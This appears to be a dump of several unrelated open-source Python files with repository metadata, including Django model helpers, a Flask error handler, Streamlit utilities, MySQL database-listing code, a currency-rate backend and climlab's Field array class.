limit_choices_to={'active': True})
region = models.CharField(_("region"), help_text=_('State or region'), blank=True, max_length=100)
primary = models.BooleanField(_("primary"), default=False)
# formatted : formatted Address for mail http://tools.ietf.org/html/draft-ietf-scim-core-schema-03
phone_re = re.compile(
r'^\+\d{1,3}' + r'((-?\d+)|(\s?\(\d+\)\s?)|\s?\d+){1,9}$'
)
validate_phone = RegexValidator(phone_re, _("Enter a valid phone number i.e. +49 (531) 123456"), 'invalid')
def update_object_from_dict(destination, source_dict, key_mapping=None):
"""
check if the values in the destination object differ from
the values in the source_dict and update if needed
key_mapping can be a simple mapping of key names or
a mapping of key names to a tuple with a key name and a transformation
for the value,
for example {'key': ('new_key', lambda x : x + 2), ..}
"""
if not key_mapping: key_mapping = {}
field_names = [f.name for f in destination._meta.fields]
new_object = True if destination.pk is None else False
updated = False
for key in source_dict:
field_name = key
transformation = None
if key in key_mapping:
if isinstance(key_mapping[key], tuple):
(field_name, transformation) = key_mapping[key]
else:
field_name = key_mapping[key]
if field_name in field_names:
if transformation is None:
new_value = source_dict[key]
else:
new_value = transformation(source_dict[key])
if new_object:
setattr(destination, field_name, new_value)
else:
old_value = getattr(destination, field_name)
if old_value != new_value:
setattr(destination, field_name, new_value)
updated = True
if updated or new_object:
destination.save()
| 35.285211 | 119 | 0.623491 | import logging
import os
import re
import uuid
from io import BytesIO
from mimetypes import guess_extension
from os.path import splitext
from PIL import Image
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.core.validators import RegexValidator
from django.db import models
from django.db.models import fields
from django.forms import forms
from django.forms.models import model_to_dict
from django.utils.crypto import get_random_string
from django.utils.text import get_valid_filename
from django.utils.translation import gettext_lazy as _
from l10n.models import Country, AdminArea
logger = logging.getLogger(__name__)
def get_filename(filename):
return os.path.normpath(get_valid_filename(os.path.basename(filename)))
def transpose_image(picture):
# copied from ImageOps.exif_transpose but avoiding to create a copy if not
# transposed
# argument is a UploadedFile Object instead of Image
# exif is only in TIFF and JPEG available
if picture.image.format not in ['JPEG', 'TIFF']:
return picture
exif = picture.image.getexif()
orientation = exif.get(0x0112)
method = {
2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = Image.open(picture.file)
transposed_image = image.transpose(method)
del exif[0x0112]
transposed_image.info["exif"] = exif.tobytes()
# create a new UploadedFile
f = BytesIO()
transposed_image.save(f, image.format)
picture = InMemoryUploadedFile(
file=f,
field_name=picture.field_name,
name=picture.name,
content_type=picture.content_type,
size=f.tell(),
charset=picture.charset,
content_type_extra=picture.content_type_extra
)
picture.image = transposed_image
return picture
return picture
def clean_picture(picture, max_upload_size):
from django.template.defaultfilters import filesizeformat
if picture and hasattr(picture, 'content_type'):
base_content_type = picture.content_type.split('/')[0]
if base_content_type in ['image']:
if picture.size > max_upload_size:
raise forms.ValidationError(
_('Please keep filesize under %(filesize)s. Current filesize %(current_filesize)s') %
{'filesize': filesizeformat(max_upload_size),
'current_filesize': filesizeformat(picture.size)})
# mimetypes.guess_extension return jpe which is quite uncommon for jpeg
if picture.content_type == 'image/jpeg':
file_ext = '.jpg'
else:
file_ext = guess_extension(picture.content_type)
if file_ext is None:
# keep the original extension
file_ext = splitext(picture.name)[1].lower()
picture.name = "%s%s" % (
get_random_string(7, allowed_chars='abcdefghijklmnopqrstuvwxyz0123456789'), file_ext)
try:
picture = transpose_image(picture)
except Exception as e:
logger.warning("Transpose image failed: ", e)
else:
raise forms.ValidationError(_('File type is not supported'))
return picture
class CaseInsensitiveEmailField(fields.EmailField):
def db_type(self, connection):
return "citext"
class AbstractBaseModelManager(models.Manager):
def get_by_natural_key(self, uuid):
return self.get(uuid=uuid)
class AbstractBaseModel(models.Model):
uuid = models.UUIDField(unique=True, default=uuid.uuid4, editable=True)
last_modified = models.DateTimeField(_('last modified'), auto_now=True)
objects = AbstractBaseModelManager()
class Meta:
abstract = True
# ordering = ['name']
get_latest_by = 'last_modified'
def natural_key(self):
return self.uuid,
def ensure_single_primary(queryset):
"""
ensure that at most one item of the queryset is primary
"""
primary_items = queryset.filter(primary=True)
if primary_items.count() > 1:
for item in primary_items[1:]:
item.primary = False
item.save()
elif primary_items.count() == 0:
item = queryset.first()
if item:
item.primary = True
item.save()
class AddressMixin(models.Model):
"""
Address information
see i.e. http://tools.ietf.org/html/draft-ietf-scim-core-schema-03 or http://schema.org/PostalAddress
"""
addressee = models.CharField(_("addressee"), max_length=80)
street_address = models.TextField(_('street address'), blank=True,
help_text=_('Full street address, with house number, street name, P.O. box, and '
'extended street address information.'), max_length=512)
city = models.CharField(_("city"), max_length=100) # , help_text=_('City or locality')
city_native = models.CharField(_("city in native language"), max_length=100, blank=True)
postal_code = models.CharField(_("postal code"), max_length=30, blank=True)
country = models.ForeignKey(Country, on_delete=models.CASCADE, verbose_name=_("country"),
limit_choices_to={'active': True})
region = models.CharField(_("region"), help_text=_('State or region'), blank=True, max_length=100)
primary = models.BooleanField(_("primary"), default=False)
# formatted : formatted Address for mail http://tools.ietf.org/html/draft-ietf-scim-core-schema-03
class Meta:
abstract = True
verbose_name = _("address")
verbose_name_plural = _("addresses")
ordering = ['addressee']
def __str__(self):
return self.addressee
phone_re = re.compile(
r'^\+\d{1,3}' + r'((-?\d+)|(\s?\(\d+\)\s?)|\s?\d+){1,9}$'
)
validate_phone = RegexValidator(phone_re, _("Enter a valid phone number i.e. +49 (531) 123456"), 'invalid')
class PhoneNumberMixin(models.Model):
phone = models.CharField(_("phone number"), max_length=30, validators=[validate_phone])
primary = models.BooleanField(_("primary"), default=False)
class Meta:
abstract = True
ordering = ['-primary']
verbose_name = _("phone number")
verbose_name_plural = _("phone numbers")
def __str__(self):
return self.phone
def update_object_from_dict(destination, source_dict, key_mapping=None):
"""
check if the values in the destination object differ from
the values in the source_dict and update if needed
key_mapping can be a simple mapping of key names or
a mapping of key names to a tuple with a key name and a transformation
for the value,
for example {'key': ('new_key', lambda x : x + 2), ..}
"""
if not key_mapping: key_mapping = {}
field_names = [f.name for f in destination._meta.fields]
new_object = True if destination.pk is None else False
updated = False
for key in source_dict:
field_name = key
transformation = None
if key in key_mapping:
if isinstance(key_mapping[key], tuple):
(field_name, transformation) = key_mapping[key]
else:
field_name = key_mapping[key]
if field_name in field_names:
if transformation is None:
new_value = source_dict[key]
else:
new_value = transformation(source_dict[key])
if new_object:
setattr(destination, field_name, new_value)
else:
old_value = getattr(destination, field_name)
if old_value != new_value:
setattr(destination, field_name, new_value)
updated = True
if updated or new_object:
destination.save()
def filter_dict_from_kls(destination, source_dict, prefix=''):
field_names = [f.name for f in destination._meta.fields]
filtered_dict = {}
for field_name in field_names:
key = '%s%s' % (prefix, field_name)
if key in source_dict:
filtered_dict[field_name] = source_dict[key]
return filtered_dict
def map_dict2dict(mapping, source_dict, with_defaults=False):
new_dict = {}
for key, value in mapping.items():
if key in source_dict:
if isinstance(value, dict):
new_key = value['name']
parser = value.get('parser', None)
if parser is not None:
try:
new_value = parser(source_dict[key])
except Exception as e:
logger.exception('could not parse value: %s' % source_dict[key])
raise e
else:
new_value = source_dict[key]
validate = value.get('validate', None)
if validate is not None:
if not validate(new_value):
raise ValueError("\"%s\" is not valid for %s" % (new_value, new_key))
else:
new_key = value
new_value = source_dict[key]
new_dict[new_key] = new_value
elif with_defaults:
# use default if no value in source_dict
try:
if isinstance(value, dict):
new_key = value['name']
new_value = value['default']
new_dict[new_key] = new_value
except KeyError:
pass
return new_dict
def update_object_from_object(destination, source, exclude=None):
if not exclude: exclude = ['id']
source_dict = model_to_dict(source, exclude=exclude)
update_object_from_dict(destination, source_dict)
| 4,791 | 893 | 337 |
3157f5f59081200ecb286bedec5b74c9a42bd95e | 226 | py | Python | app/main/errors.py | pascaline-irabaruta/news-app | 073479204e6fd0f992e1529824171945e520ee16 | [
"MIT"
] | 1 | 2022-02-09T14:35:37.000Z | 2022-02-09T14:35:37.000Z | app/main/errors.py | Nyota254/news-summary | a2844de42c00f8eab26e358e2ebfdcfe06a372df | [
"MIT"
] | null | null | null | app/main/errors.py | Nyota254/news-summary | a2844de42c00f8eab26e358e2ebfdcfe06a372df | [
"MIT"
] | null | null | null | from flask import render_template
from . import main
@main.app_errorhandler(404)
def four_o_four(error):
'''
This is a function that renders the 404 error page
'''
return render_template('fourofour.html'),404
| 22.6 | 54 | 0.725664 | from flask import render_template
from . import main
@main.app_errorhandler(404)
def four_o_four(error):
'''
This is a function that renders the 404 error page
'''
return render_template('fourofour.html'),404
| 0 | 0 | 0 |
9b44dec8def3ef6e4bf77338dedc2dbf168db1a2 | 1,829 | py | Python | web/utility.py | dan0nchik/SAP-HANA-AutoML | 68cde80bd7fbfc751fb56062af30aec9238f9fb3 | [
"MIT"
] | 59 | 2021-01-10T18:35:38.000Z | 2022-02-28T16:49:06.000Z | web/utility.py | u1810291/SAP-HANA-AutoML | 06200bd1f813916fc81eb1ccb0ed0b1275e22945 | [
"MIT"
] | 3 | 2021-02-01T19:33:39.000Z | 2021-06-29T08:32:33.000Z | web/utility.py | u1810291/SAP-HANA-AutoML | 06200bd1f813916fc81eb1ccb0ed0b1275e22945 | [
"MIT"
] | 10 | 2021-06-18T12:35:34.000Z | 2021-12-28T18:48:36.000Z | import base64
import sys
from contextlib import contextmanager
from io import StringIO
from threading import current_thread
from typing import Union
import hana_ml.dataframe
import pandas
import streamlit as st
from streamlit.report_thread import REPORT_CONTEXT_ATTR_NAME
# from https://discuss.streamlit.io/t/cannot-print-the-terminal-output-in-streamlit/6602/2
@contextmanager
@contextmanager
@contextmanager
def get_table_download_link(df, file_name):
"""Generates a link allowing the data in a given panda dataframe to be downloaded
in: dataframe, file name
out: href string
"""
csv = df.to_csv(index=False)
b64 = base64.b64encode(
csv.encode()
).decode() # some strings <-> bytes conversions necessary here
return f'<a href="data:file/csv;base64,{b64}" download="{file_name}.csv">Download file</a>'
| 26.128571 | 95 | 0.651722 | import base64
import sys
from contextlib import contextmanager
from io import StringIO
from threading import current_thread
from typing import Union
import hana_ml.dataframe
import pandas
import streamlit as st
from streamlit.report_thread import REPORT_CONTEXT_ATTR_NAME
# from https://discuss.streamlit.io/t/cannot-print-the-terminal-output-in-streamlit/6602/2
@contextmanager
def st_redirect(src, dst):
placeholder = st.empty()
output_func = getattr(placeholder, dst)
with StringIO() as buffer:
old_write = src.write
def new_write(b):
if getattr(current_thread(), REPORT_CONTEXT_ATTR_NAME, None):
buffer.write(b)
output_func(buffer.getvalue())
else:
old_write(b)
try:
src.write = new_write
yield
finally:
src.write = old_write
@contextmanager
def st_stdout(dst):
with st_redirect(sys.stdout, dst):
yield
@contextmanager
def st_stderr(dst):
with st_redirect(sys.stderr, dst):
yield
def get_table_download_link(df, file_name):
"""Generates a link allowing the data in a given panda dataframe to be downloaded
in: dataframe, file name
out: href string
"""
csv = df.to_csv(index=False)
b64 = base64.b64encode(
csv.encode()
).decode() # some strings <-> bytes conversions necessary here
return f'<a href="data:file/csv;base64,{b64}" download="{file_name}.csv">Download file</a>'
def get_types(df: pandas.DataFrame):
categorical = []
for column in df.columns:
if (
df[column].dtype in ["object", "bool"]
or df[column].nunique() < df.shape[0] / 100 * 30
):
categorical.append(column)
return categorical if len(categorical) > 0 else None
| 884 | 0 | 89 |
1272e89ac9aa705c7db7a484d28380dfd00cbfdf | 207 | py | Python | bmcs_beam/mxn/matresdev/simiter/sim_pstudy/__init__.py | bmcs-group/bmcs_beam | b53967d0d0461657ec914a3256ec40f9dcff80d5 | [
"MIT"
] | 1 | 2021-05-07T11:10:27.000Z | 2021-05-07T11:10:27.000Z | bmcs_beam/mxn/matresdev/simiter/sim_pstudy/__init__.py | bmcs-group/bmcs_beam | b53967d0d0461657ec914a3256ec40f9dcff80d5 | [
"MIT"
] | null | null | null | bmcs_beam/mxn/matresdev/simiter/sim_pstudy/__init__.py | bmcs-group/bmcs_beam | b53967d0d0461657ec914a3256ec40f9dcff80d5 | [
"MIT"
] | null | null | null |
from .sim_model import SimModel
from .i_sim_model import ISimModel
from .sim_array import SimArray
from .sim_array_view import SimArrayView
from .sim_pstudy import SimPStudy
from .sim_output import SimOut
| 23 | 40 | 0.845411 |
from .sim_model import SimModel
from .i_sim_model import ISimModel
from .sim_array import SimArray
from .sim_array_view import SimArrayView
from .sim_pstudy import SimPStudy
from .sim_output import SimOut
| 0 | 0 | 0 |
fba1cc411163b25b7360c734749b5a68e6e1fd88 | 1,887 | py | Python | ensembl_prodinf/db_utils.py | danstaines/ensembl-prodinf | 65c51ac7f2dd4fe12b051f417ca252979916798b | [
"Apache-2.0"
] | null | null | null | ensembl_prodinf/db_utils.py | danstaines/ensembl-prodinf | 65c51ac7f2dd4fe12b051f417ca252979916798b | [
"Apache-2.0"
] | null | null | null | ensembl_prodinf/db_utils.py | danstaines/ensembl-prodinf | 65c51ac7f2dd4fe12b051f417ca252979916798b | [
"Apache-2.0"
] | null | null | null | # Utilities for interacting with databases
import os
from urllib.parse import urlparse
from sqlalchemy import create_engine, text
from ensembl_prodinf.server_utils import get_file_sizes
from sqlalchemy.engine.url import make_url
def list_databases(db_uri, query):
"""
List databases on a specified MySQL server
Arguments:
db_uri : URI of MySQL server e.g. mysql://user@host:3306/
query : optional regular expression to filter databases e.g. .*_core_.*
"""
valid_uri = validate_mysql_url(db_uri)
engine = create_engine(valid_uri)
if(query == None):
s = text("select schema_name from information_schema.schemata")
else:
s = text("select schema_name from information_schema.schemata where schema_name rlike :q")
with engine.connect() as con:
return [str(r[0]) for r in con.execute(s, {"q": query}).fetchall()]
def get_database_sizes(db_uri, query, dir_name):
"""
List sizes of databases on a specified MySQL server
Arguments:
db_uri : URI of MySQL server e.g. mysql://user@host:3306/ (file system must be accessible)
query : optional regular expression to filter databases e.g. .*_core_.*
dir_name : location of MySQL data files on server
"""
db_list = list_databases(db_uri, query)
url = make_url(db_uri)
dir_path = os.path.join(dir_name, str(url.port), 'data')
sizes = get_file_sizes(url.host, dir_path)
return {db: sizes[db] for db in db_list if db in sizes.keys()}
| 37 | 98 | 0.696873 | # Utilities for interacting with databases
import os
from urllib.parse import urlparse
from sqlalchemy import create_engine, text
from ensembl_prodinf.server_utils import get_file_sizes
from sqlalchemy.engine.url import make_url
def validate_mysql_url(db_uri):
parsed_uri = urlparse(db_uri)
if parsed_uri.scheme != 'mysql':
raise ValueError('list_databases can only work with MySQL databases')
try:
if parsed_uri.port is None:
raise ValueError('Invalid port number in db_uri')
except ValueError as e:
raise ValueError('Invalid port: {}'.format(e))
return db_uri
def list_databases(db_uri, query):
"""
List databases on a specified MySQL server
Arguments:
db_uri : URI of MySQL server e.g. mysql://user@host:3306/
query : optional regular expression to filter databases e.g. .*_core_.*
"""
valid_uri = validate_mysql_url(db_uri)
engine = create_engine(valid_uri)
if(query == None):
s = text("select schema_name from information_schema.schemata")
else:
s = text("select schema_name from information_schema.schemata where schema_name rlike :q")
with engine.connect() as con:
return [str(r[0]) for r in con.execute(s, {"q": query}).fetchall()]
def get_database_sizes(db_uri, query, dir_name):
"""
List sizes of databases on a specified MySQL server
Arguments:
db_uri : URI of MySQL server e.g. mysql://user@host:3306/ (file system must be accessible)
query : optional regular expression to filter databases e.g. .*_core_.*
dir_name : location of MySQL data files on server
"""
db_list = list_databases(db_uri, query)
url = make_url(db_uri)
dir_path = os.path.join(dir_name, str(url.port), 'data')
sizes = get_file_sizes(url.host, dir_path)
return {db: sizes[db] for db in db_list if db in sizes.keys()}
| 367 | 0 | 23 |
880d70db0d267353c783a25a4265ba43f300be93 | 782 | py | Python | src/encoded/tests/test_upgrade_source.py | procha2/encoded | e9f122362b71f3b8641023b8d2d5ad531d3484b7 | [
"MIT"
] | 102 | 2015-05-20T01:17:43.000Z | 2022-03-07T06:03:55.000Z | src/encoded/tests/test_upgrade_source.py | procha2/encoded | e9f122362b71f3b8641023b8d2d5ad531d3484b7 | [
"MIT"
] | 901 | 2015-01-07T23:11:57.000Z | 2022-03-18T13:56:12.000Z | src/encoded/tests/test_upgrade_source.py | procha2/encoded | e9f122362b71f3b8641023b8d2d5ad531d3484b7 | [
"MIT"
] | 65 | 2015-02-06T23:00:26.000Z | 2022-01-22T07:58:44.000Z | import pytest
| 35.545455 | 89 | 0.684143 | import pytest
def test_source_upgrade(upgrader, source_1):
value = upgrader.upgrade('source', source_1, target_version='2')
assert value['schema_version'] == '2'
assert value['status'] == 'current'
assert 'award' not in value
assert 'submitted_by' not in value
assert 'lab' not in value
def test_source_upgrade_5_6(upgrader, source_5):
value = upgrader.upgrade('source', source_5, current_version='5', target_version='6')
assert value['schema_version'] == '6'
assert value['status'] == 'released'
source_5['status'] = 'disabled'
source_5['schema_version'] = '5'
value = upgrader.upgrade('source', source_5, current_version='5', target_version='6')
assert value['schema_version'] == '6'
assert value['status'] == 'deleted'
| 720 | 0 | 46 |
8515fdec3b7e47b694ca09e5b731ef270e5707c5 | 2,642 | py | Python | robot_explorers/gui/__main__.py | Nino-SEGALA/HuaweiChallenge | a628f5550063422b095300846bde5680a5e95414 | [
"BSD-3-Clause"
] | null | null | null | robot_explorers/gui/__main__.py | Nino-SEGALA/HuaweiChallenge | a628f5550063422b095300846bde5680a5e95414 | [
"BSD-3-Clause"
] | null | null | null | robot_explorers/gui/__main__.py | Nino-SEGALA/HuaweiChallenge | a628f5550063422b095300846bde5680a5e95414 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Copyright (c) 2020 Huawei Technologies Sweden AB, All rights reserved.
Authors:
Karl Gäfvert
'''
import argparse
from .gui import GUI
parser = argparse.ArgumentParser(description='Run GUI')
parser.add_argument('input_dir', metavar='input_dir', type=str, help='Path to saved simulation. Ex. "results/10212020_021804"')
parser.add_argument('--fps', type=int, default='2', help='FPS during visualization')
parser.add_argument('--silent-strategy-0', action='store_true', help='Disable strategy 0 simulator output')
parser.add_argument('--silent-strategy-1', action='store_true', help='Disable strategy 1 simulator output')
parser.add_argument('--about', action='store_true', help='Print info and license')
# Args
args = parser.parse_args()
# Print about
if args.about:
print('''Copyright (c) 2020 Huawei Technologies Sweden AB, All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Karl Gäfvert
Romain Deffayet
''')
exit(0)
gui = GUI(disable_0=args.silent_strategy_0, disable_1=args.silent_strategy_1)
gui.play_from_file(args.input_dir, fps=args.fps)
| 42.612903 | 128 | 0.746026 | # -*- coding: utf-8 -*-
'''
Copyright (c) 2020 Huawei Technologies Sweden AB, All rights reserved.
Authors:
Karl Gäfvert
'''
import argparse
from .gui import GUI
parser = argparse.ArgumentParser(description='Run GUI')
parser.add_argument('input_dir', metavar='input_dir', type=str, help='Path to saved simulation. Ex. "results/10212020_021804"')
parser.add_argument('--fps', type=int, default='2', help='FPS during visualization')
parser.add_argument('--silent-strategy-0', action='store_true', help='Disable strategy 0 simulator output')
parser.add_argument('--silent-strategy-1', action='store_true', help='Disable strategy 1 simulator output')
parser.add_argument('--about', action='store_true', help='Print info and license')
# Args
args = parser.parse_args()
# Print about
if args.about:
print('''Copyright (c) 2020 Huawei Technologies Sweden AB, All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Karl Gäfvert
Romain Deffayet
''')
exit(0)
gui = GUI(disable_0=args.silent_strategy_0, disable_1=args.silent_strategy_1)
gui.play_from_file(args.input_dir, fps=args.fps)
| 0 | 0 | 0 |
d7a4e00fe1c08fb5478a7ee1767b733ba5867aef | 3,113 | py | Python | djmoney_rates/backends.py | Songtrust/django-money-rates | a2b9e7d31d1799751e7dfaf6cb5094256530e79e | [
"BSD-3-Clause"
] | null | null | null | djmoney_rates/backends.py | Songtrust/django-money-rates | a2b9e7d31d1799751e7dfaf6cb5094256530e79e | [
"BSD-3-Clause"
] | 1 | 2022-02-01T18:28:43.000Z | 2022-02-01T20:42:05.000Z | djmoney_rates/backends.py | Songtrust/django-money-rates | a2b9e7d31d1799751e7dfaf6cb5094256530e79e | [
"BSD-3-Clause"
] | null | null | null | from __future__ import unicode_literals
import logging
import json
from django.core.exceptions import ImproperlyConfigured
from urllib.request import urlopen
from .exceptions import RateBackendError
from .models import RateSource, Rate
from .settings import money_rates_settings
logger = logging.getLogger(__name__)
| 31.765306 | 97 | 0.638612 | from __future__ import unicode_literals
import logging
import json
from django.core.exceptions import ImproperlyConfigured
from urllib.request import urlopen
from .exceptions import RateBackendError
from .models import RateSource, Rate
from .settings import money_rates_settings
logger = logging.getLogger(__name__)
class BaseRateBackend(object):
source_name = None
base_currency = None
def get_source_name(self):
"""
Return the name that identifies the ratings source
"""
if not self.source_name:
raise RateBackendError("'source_name' can't be empty or "
"you should override 'get_source_name'")
return self.source_name
def get_base_currency(self):
"""
Return the base currency to which the rates are referred
"""
if not self.base_currency:
raise RateBackendError("'base_currency' can't be empty or "
"you should override 'get_base_currency'")
return self.base_currency
def get_rates(self):
"""
Return a dictionary that maps currency code with its rate value
"""
raise NotImplementedError
def update_rates(self):
"""
Creates or updates rates for a source
"""
source, created = RateSource.objects.get_or_create(name=self.get_source_name())
source.base_currency = self.get_base_currency()
source.save()
for currency, value in self.get_rates().items():
try:
rate = Rate.objects.get(source=source, currency=currency)
except Rate.DoesNotExist:
rate = Rate(source=source, currency=currency)
rate.value = value
rate.save()
class OpenExchangeBackend(BaseRateBackend):
source_name = "openexchange.org"
def __init__(self):
if not money_rates_settings.OPENEXCHANGE_URL:
raise ImproperlyConfigured(
"OPENEXCHANGE_URL setting should not be empty when using OpenExchangeBackend")
if not money_rates_settings.OPENEXCHANGE_APP_ID:
raise ImproperlyConfigured(
"OPENEXCHANGE_APP_ID setting should not be empty when using OpenExchangeBackend")
# Build the base api url
base_url = "%s?app_id=%s" % (money_rates_settings.OPENEXCHANGE_URL,
money_rates_settings.OPENEXCHANGE_APP_ID)
# Change the base currency whether it is specified in settings
base_url += "&base=%s" % self.get_base_currency()
self.url = base_url
def get_rates(self):
try:
logger.debug("Connecting to url %s" % self.url)
data = urlopen(self.url).read().decode("utf-8")
return json.loads(data)['rates']
except Exception as e:
logger.exception("Error retrieving data from %s", self.url)
raise RateBackendError("Error retrieving rates: %s" % e)
def get_base_currency(self):
return money_rates_settings.OPENEXCHANGE_BASE_CURRENCY
| 1,151 | 1,593 | 46 |
3350009913018054be2ddf059f93dbc77731d306 | 10,721 | py | Python | climlab/domain/field.py | nfeldl/climlab | 2cabb49e2c3f54c1795f24338ef5ee44e49fc7e7 | [
"BSD-3-Clause",
"MIT"
] | 160 | 2015-02-25T15:56:37.000Z | 2022-03-14T23:51:23.000Z | climlab/domain/field.py | nfeldl/climlab | 2cabb49e2c3f54c1795f24338ef5ee44e49fc7e7 | [
"BSD-3-Clause",
"MIT"
] | 137 | 2015-12-18T17:39:31.000Z | 2022-02-04T20:50:53.000Z | climlab/domain/field.py | nfeldl/climlab | 2cabb49e2c3f54c1795f24338ef5ee44e49fc7e7 | [
"BSD-3-Clause",
"MIT"
] | 54 | 2015-04-28T05:57:39.000Z | 2022-02-17T08:15:11.000Z | # Trying a new data model for state variables and domains:
# Create a new sub-class of numpy.ndarray
# that has as an attribute the domain itself
# Following a tutorial on subclassing ndarray here:
#
# http://docs.scipy.org/doc/numpy/user/basics.subclassing.html
from __future__ import division
import numpy as np
from climlab.domain.xarray import Field_to_xarray
class Field(np.ndarray):
"""Custom class for climlab gridded quantities, called Field.
This class behaves exactly like :py:class:`numpy.ndarray`
but every object has an attribute called ``self.domain``
which is the domain associated with that field (e.g. state variables).
**Initialization parameters** \n
An instance of ``Field`` is initialized with the following
arguments:
:param array input_array: the array which the Field object should be
initialized with
:param domain: the domain associated with that field
(e.g. state variables)
:type domain: :class:`~climlab.domain.domain._Domain`
**Object attributes** \n
Following object attribute is generated during initialization:
:var domain: the domain associated with that field
(e.g. state variables)
:vartype domain: :class:`~climlab.domain.domain._Domain`
:Example:
::
>>> import climlab
>>> import numpy as np
>>> from climlab import domain
>>> from climlab.domain import field
>>> # distribution of state
>>> distr = np.linspace(0., 10., 30)
>>> # domain creation
>>> sfc, atm = domain.single_column()
>>> # build state of type Field
>>> s = field.Field(distr, domain=atm)
>>> print s
[ 0. 0.34482759 0.68965517 1.03448276 1.37931034
1.72413793 2.06896552 2.4137931 2.75862069 3.10344828
3.44827586 3.79310345 4.13793103 4.48275862 4.82758621
5.17241379 5.51724138 5.86206897 6.20689655 6.55172414
6.89655172 7.24137931 7.5862069 7.93103448 8.27586207
8.62068966 8.96551724 9.31034483 9.65517241 10. ]
>>> print s.domain
climlab Domain object with domain_type=atm and shape=(30,)
>>> # can slice this and it preserves the domain
>>> # a more full-featured implementation would have intelligent
>>> # slicing like in iris
>>> s.shape == s.domain.shape
True
>>> s[:1].shape == s[:1].domain.shape
False
>>> # But some things work very well. E.g. new field creation:
>>> s2 = np.zeros_like(s)
>>> print s2
[ 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.
0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
>>> print s2.domain
climlab Domain object with domain_type=atm and shape=(30,)
"""
## Loosely based on the approach in numpy.ma.core.MaskedArray
# This determines how we slice a Field object
def __getitem__(self, indx):
"""
x.__getitem__(y) <==> x[y]
Return the item described by i, as a Field.
"""
# create a view of just the data as np.ndarray and slice it
dout = self.view(np.ndarray)[indx]
try:
#Force dout to type Field
dout = dout.view(type(self))
# Now slice the domain
dout.domain = self.domain[indx]
# Inherit attributes from self
if hasattr(self, 'interfaces'):
dout.interfaces = self.interfaces
except:
# The above will fail if we extract a single item
# in which case we should just return the item
pass
return dout
def to_xarray(self):
"""Convert Field object to xarray.DataArray"""
return Field_to_xarray(self)
def global_mean(field):
"""Calculates the latitude weighted global mean of a field
with latitude dependence.
:param Field field: input field
:raises: :exc:`ValueError` if input field has no latitude axis
:return: latitude weighted global mean of the field
:rtype: float
:Example:
initial global mean temperature of EBM model::
>>> import climlab
>>> model = climlab.EBM()
>>> climlab.global_mean(model.Ts)
Field(11.997968598413685)
"""
try:
lat = field.domain.lat.points
except:
raise ValueError('No latitude axis in input field.')
try:
# Field is 2D latitude / longitude
lon = field.domain.lon.points
return _global_mean_latlon(field.squeeze())
except:
# Field is 1D latitude only (zonal average)
lat_radians = np.deg2rad(lat)
return _global_mean(field.squeeze(), lat_radians)
def to_latlon(array, domain, axis = 'lon'):
"""Broadcasts a 1D axis dependent array across another axis.
:param array input_array: the 1D array used for broadcasting
:param domain: the domain associated with that
array
:param axis: the axis that the input array will
be broadcasted across
[default: 'lon']
:return: Field with the same shape as the
domain
:Example:
::
>>> import climlab
>>> from climlab.domain.field import to_latlon
>>> import numpy as np
>>> state = climlab.surface_state(num_lat=3, num_lon=4)
>>> m = climlab.EBM_annual(state=state)
>>> insolation = np.array([237., 417., 237.])
>>> insolation = to_latlon(insolation, domain = m.domains['Ts'])
